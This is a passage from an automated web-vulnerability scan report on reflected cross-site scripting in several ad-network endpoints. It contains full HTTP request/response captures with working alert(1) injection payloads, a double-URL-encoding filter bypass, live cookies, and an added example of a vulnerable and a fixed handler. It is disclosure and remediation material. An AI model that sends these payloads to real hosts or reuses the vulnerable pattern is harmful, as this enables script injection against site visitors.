:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!*=%=]S!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!*=%=]S!#MTF!!!!'=%=]S!#MTH!!!!,=%=]S!#MTI!!!!,=%=]S!#MTJ!!!!,=%=]S!#Nyi!!!!#=!eq^!#O29!!!!(=%@(m!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#SV*!!!!*=%@(m!#Sq>!!!!#='>m<!#T,d~~!#T^F!!!!#=!yv!!#UDQ!!!!,=%=]S!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Z8A!!!!$=%@(m!#Z8E!!!!)=%@(m!#]%`!!!!#=#33)!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Z!!!!!(=%@(m!#]Z#!!!!$=%@(m!#]w)!!!!*=%=]S!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^0%!!!!*=%@(m!#^d6!!!!#=#33)!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-7!!!!)=%@(m!#`-Z!!!!$=%=]S!#`-[!!!!$=%=]S!#`U0!!!!$=%@(m!#`cS!!!!#=%id8!#a=6!!!!$=%@(m!#a=7!!!!$=%@(m!#a=9!!!!$=%@(m!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg!!!!#=!iRr!#bTx!!!!#=%if4!#biv!!!!#=!iK0!#bj8!!!!#=#mS:!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8V!!!!(=%@(m!#c8X!!!!(=%@(m!#c8c!!!!(=%@(m!#c8i!!!!(=%@(m!#c8m!!!!(=%@(m!#c8p!!!!(=%@(m!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fBj!!!!)=%@(m!#fBk!!!!)=%@(m!#fBm!!!!)=%@(m!#fBn!!!!)=%@(m!#fFG!!!!#=#T_g!#fG)!!!!$=%@(m!#fG+!!!!$=%@(m!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g/7!!!!*=%@(m!#g=r!!!!$=%@(m!#gsl!!!!#=#mS:!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#k]0!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9
!#uQC!!!!*=%=]S!#uR3!!!!$=%@(m!#uR7!!!!)=%@(m!#uRN!!!!#=#mS:!#uRP!!!!#=#mS:!#uY<!!!!#=!yv$!#v,U!!!!#=#mS:!#v,Y!!!!#=#mS:!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xG5!!!!#=!yuk!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$#9a!!!!#=%j],!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#X4!!!!#=#%VO!$#yu!!!!*=%=]S!$$K<!!!!#=#$.g!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$'@Q!!!!$=%@(m!$(!P!!!!)=%@(m!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$*hf!!!!$=%@(m!$+Dr!!!!#=#mS:!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,gE!!!!$=!iQt!$,jw!!!!#=#mS:!$-,y!!!!#=#mS:!$-kY!!!!#=#mS:!$-kv!!!!#=#mS:!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5"; ih="b!!!!F!'4@g!!!!#=$KA3!)AU6!!!!#='htn!-5BI!!!!$=$J^*!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.`.U!!!!#='htS!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1e75!!!!#=%3V6!1mH9!!!!#=!i98!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2"; vuday1=!!!!#Gf(n`NBHr8H)J%d; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:03:29 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 13 Jun 2011 11:03:29 GMT
Pragma: no-cache
Content-Length: 4324
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?9f866"-alert(1)-"91e191e34f5=1&Z=160x600&s=1812134&_salt=880973763";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar
...[SNIP]...

4.44. http://ad.yieldmanager.com/v0/admeld-match [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /v0/admeld-match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 963e2%2527%253balert%25281%2529%252f%252fb76a6b65442 was submitted in the admeld_callback parameter. This input was echoed as 963e2';alert(1)//b76a6b65442 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the admeld_callback request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
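The following is an added example written for this page, not code from the XSS.CX report or from ad.yieldmanager.com. It reproduces the ordering bug the finding describes: the filter runs on the once-decoded value, then the application decodes a second time, so %2527 passes the filter and only becomes an apostrophe afterwards. The exact character set the application blocks is not stated in the report, so the BLOCKED pattern is an assumption, as are the allow-listed host and the variable name in the emitted script; the parameter value and the observed echo are quoted from the finding. The fixed handler decodes exactly once, validates the canonical value as a URL on an allow-listed host, and encodes it for the single-quoted string context on output.

```javascript
// Added example (not the ad server's code). Finding 4.44: a second URL-decode
// after validation turns a double-encoded apostrophe into a real one.

// Quoted from the finding: the submitted value and the echo the scanner saw.
const DOUBLE_ENCODED = 'http://tag.admeld.com/match963e2%2527%253balert%25281%2529%252f%252fb76a6b65442';
const OBSERVED_ECHO = "http://tag.admeld.com/match963e2';alert(1)//b76a6b65442";

// Assumption: the application's filter rejects these characters. The report
// only says "certain characters that are often used in XSS attacks" are blocked.
const BLOCKED = /['"<>;()]/;

// Assumed allow-list for the callback host.
const ALLOWED_HOSTS = ['tag.admeld.com'];

// The web server or framework decodes the query string once before the
// application code runs.
function frameworkDecode(raw) {
  return decodeURIComponent(raw);
}

// Vulnerable handler, modelling the report: validate the once-decoded value,
// then decode it again and write it into a single-quoted JS string.
function renderCallbackVulnerable(raw) {
  const once = frameworkDecode(raw);
  if (BLOCKED.test(once)) return null;      // filter sees %27, not an apostrophe
  const twice = decodeURIComponent(once);   // %27 becomes ' here, after the check
  return "var admeld_callback = '" + twice + "';";
}

// Encode for a JS string literal. '<' is always encoded, so the literal can
// never spell "</script" even though '/' is left readable for URLs.
function jsStringEncode(s) {
  return s.replace(/[^A-Za-z0-9 _.,:\/?=&%-]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Fixed handler: decode once (the framework's decode), validate the canonical
// value as an http(s) URL on an allowed host, then encode for the output context.
function renderCallbackFixed(raw) {
  const once = frameworkDecode(raw);
  let url;
  try { url = new URL(once); } catch (e) { return null; }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  if (!ALLOWED_HOSTS.includes(url.hostname)) return null;
  return "var admeld_callback = '" + jsStringEncode(once) + "';";
}

// Walk the single-quoted literal as the JS lexer would and check that nothing
// follows it except the template's own closing quote and semicolon.
function literalIntact(js) {
  if (js === null) return false;
  const prefix = "var admeld_callback = '";
  if (!js.startsWith(prefix)) return false;
  let i = prefix.length;
  while (i < js.length && js[i] !== "'") i += js[i] === '\\' ? 2 : 1;
  return js.slice(i) === "';";
}

console.log('vulnerable:', renderCallbackVulnerable(DOUBLE_ENCODED));
console.log('fixed:     ', renderCallbackFixed(DOUBLE_ENCODED));
```

The fixed handler never sees an apostrophe for the double-encoded payload at all: after the single decode the value still reads %27, which is harmless text inside the literal. A singly-encoded apostrophe (%27 on the wire) does reach the fixed handler as a real quote, and it is the output encoding, not the filter, that keeps it inside the string.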

Request

GET /v0/admeld-match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=420&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match963e2%2527%253balert%25281%2529%252f%252fb76a6b65442 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:22:04 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: private
Content-Length: 328
Content-Type: text/javascript
Age: 0
Proxy-Connection: close
Server: YTS/1.18.4

document.write('<img width="0" height="0" src="http://tag.admeld.com/match963e2';alert(1)//b76a6b65442?admeld_adprovider_id=420&external_user_id=3%3b0%3btPp_PCqix5Obrh3yjlbLU3gyTyCUWbWt4M5BfDPkgGVUdf8QWVFYFStNAfc-&expiration=1309173724" />
...[SNIP]...

4.45. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e962d'%3balert(1)//6b165d444b3 was submitted in the admeld_adprovider_id parameter. This input was echoed as e962d';alert(1)//6b165d444b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld/match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=78e962d'%3balert(1)//6b165d444b3&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=330100732990473967$0$335422886; DotomiNet=2$DjQqblZ1RXZKA2VdBAN%2BXAJHKSpAJ24SQR0PVVBLY3Jma1xARWZBXQAFW0dLSkdZYmFde25mXndRLwVZaVwXVzMdb1F%2BfgB7AEQJWmhQU0lnfmN%2BCxxQQQMwAARVT0VLQl5jalx9amdWd0J0VlgmDg4BbwFCF3B6B3YHQgtVYVNQSGF6cixKTAgJVwpKRjlES05GU2VhW3tvYlN%2BQnhGBmc%3D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:21:06 GMT
X-Name: rtb-o07
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 199

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=78e962d';alert(1)//6b165d444b3&external_user_id=WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP&expiration=1309173666" alt="" />');

4.46. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e201a'%3balert(1)//d0668213c16 was submitted in the admeld_callback parameter. This input was echoed as e201a';alert(1)//d0668213c16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld/match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matche201a'%3balert(1)//d0668213c16 HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=330100732990473967$0$335422886; DotomiNet=2$DjQqblZ1RXZKA2VdBAN%2BXAJHKSpAJ24SQR0PVVBLY3Jma1xARWZBXQAFW0dLSkdZYmFde25mXndRLwVZaVwXVzMdb1F%2BfgB7AEQJWmhQU0lnfmN%2BCxxQQQMwAARVT0VLQl5jalx9amdWd0J0VlgmDg4BbwFCF3B6B3YHQgtVYVNQSGF6cixKTAgJVwpKRjlES05GU2VhW3tvYlN%2BQnhGBmc%3D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:21:08 GMT
X-Name: rtb-o04
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 199

document.write('<img src="http://tag.admeld.com/matche201a';alert(1)//d0668213c16?admeld_adprovider_id=78&external_user_id=WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP&expiration=1309173668" alt="" />');

4.47. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30caf'-alert(1)-'347d3038231 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=19330caf'-alert(1)-'347d3038231&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYBCAEKAQw0ICz7wQQ0ICz7wQYAw..; anj=Kfw)k>JS.m*cOUs+'x*9/fov!U?-XD/@T`Eo*G>j9p6Kr5j'_7CgzlO:Fvgpkp?4[v=vwq`X_dWeNwpF6L1pOp0@m=r]@w@qmB`wa.gANc?%+]4$8<B8`4]:lCT3*9!qMQcil4XYmQ8WsDzIs#O67VmMmo)bHHWI6ZNYX0a_OT4xLEJYuSASUz$!y`uCnDKOlRBQu-`F+^8q^'[id[S7lqL3SyxsCSr9%@'BHMj:vbN!%A^*8GRvRZzGKBXAg>XGd5%ZV[>#w8#[npwDqVVGb#*ghU%C%7=MVqC2pmBp[Pxux0V[OL(pbe9FyrT[y*nF0xYV^1(9^IA4Y5vQ.63A13Xwt4yzbGW.9sLBw[mW8s6J_PV-8*MjghNoq:MVp!i%g:7B+-LBCkWVYq_!7QJ2ltk?f[Ob[1Nft-Sn1ma>DD[PDURe)51Ox>N/si@JJM]yC]x.!/L]TZ*wZi@6w8U'aoF=ae0W!Uew.vN=.wG!rYe0n(oapLJIa%K^mCY1KfotBEb; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 14-Jun-2011 11:03:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:03:46 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 13 Jun 2011 11:03:46 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=19330caf'-alert(1)-'347d3038231&external_user_id=3420415245200633085&expiration=0" width="0" height="0"/>');

4.48. http://admeld.adnxs.com/usersync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cb4b'-alert(1)-'b719ccbe853 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match9cb4b'-alert(1)-'b719ccbe853 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYBCAEKAQw0ICz7wQQ0ICz7wQYAw..; anj=Kfw)k>JS.m*cOUs+'x*9/fov!U?-XD/@T`Eo*G>j9p6Kr5j'_7CgzlO:Fvgpkp?4[v=vwq`X_dWeNwpF6L1pOp0@m=r]@w@qmB`wa.gANc?%+]4$8<B8`4]:lCT3*9!qMQcil4XYmQ8WsDzIs#O67VmMmo)bHHWI6ZNYX0a_OT4xLEJYuSASUz$!y`uCnDKOlRBQu-`F+^8q^'[id[S7lqL3SyxsCSr9%@'BHMj:vbN!%A^*8GRvRZzGKBXAg>XGd5%ZV[>#w8#[npwDqVVGb#*ghU%C%7=MVqC2pmBp[Pxux0V[OL(pbe9FyrT[y*nF0xYV^1(9^IA4Y5vQ.63A13Xwt4yzbGW.9sLBw[mW8s6J_PV-8*MjghNoq:MVp!i%g:7B+-LBCkWVYq_!7QJ2ltk?f[Ob[1Nft-Sn1ma>DD[PDURe)51Ox>N/si@JJM]yC]x.!/L]TZ*wZi@6w8U'aoF=ae0W!Uew.vN=.wG!rYe0n(oapLJIa%K^mCY1KfotBEb; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 14-Jun-2011 11:03:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:03:50 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 13 Jun 2011 11:03:50 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match9cb4b'-alert(1)-'b719ccbe853?admeld_adprovider_id=193&external_user_id=3420415245200633085&expiration=0" width="0" height="0"/>');

4.49. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d86c8'%3balert(1)//f56d3235b6d was submitted in the admeld_adprovider_id parameter. This input was echoed as d86c8';alert(1)//f56d3235b6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=73d86c8'%3balert(1)//f56d3235b6d&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=304YId6UCEb

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
P3P: CP=NOI ADM DEV CUR
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:21:16 GMT
Expires: Mon, 13 Jun 2011 11:21:16 GMT
Set-Cookie: 2=304YId6UCEb; Domain=.lucidmedia.com; Expires=Tue, 12-Jun-2012 11:21:16 GMT; Path=/
Content-Type: text/plain
Content-Length: 192
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73d86c8';alert(1)//f56d3235b6d&external_user_id=3460050161923843111"/>');

4.50. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bff1e'%3balert(1)//7b738c3dd7a was submitted in the admeld_callback parameter. This input was echoed as bff1e';alert(1)//7b738c3dd7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchbff1e'%3balert(1)//7b738c3dd7a HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=304YId6UCEb

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
P3P: CP=NOI ADM DEV CUR
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:21:15 GMT
Expires: Mon, 13 Jun 2011 11:21:16 GMT
Set-Cookie: 2=304YId6UCEb; Domain=.lucidmedia.com; Expires=Tue, 12-Jun-2012 11:21:16 GMT; Path=/
Content-Type: text/plain
Content-Length: 192
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/matchbff1e';alert(1)//7b738c3dd7a?admeld_adprovider_id=73&external_user_id=3460050161923843111"/>');

4.51. http://adnxs.revsci.net/imp [Z parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69369'-alert(1)-'a8318c35dc5 was submitted in the Z parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x9069369'-alert(1)-'a8318c35dc5&s=748066&r=1&_salt=1188639314&u=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert%28document.cookie%29-%25225958ea17fd2%3D1 HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 14-Jun-2011 11:21:10 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 13 Jun 2011 11:21:10 GMT
Content-Length: 864

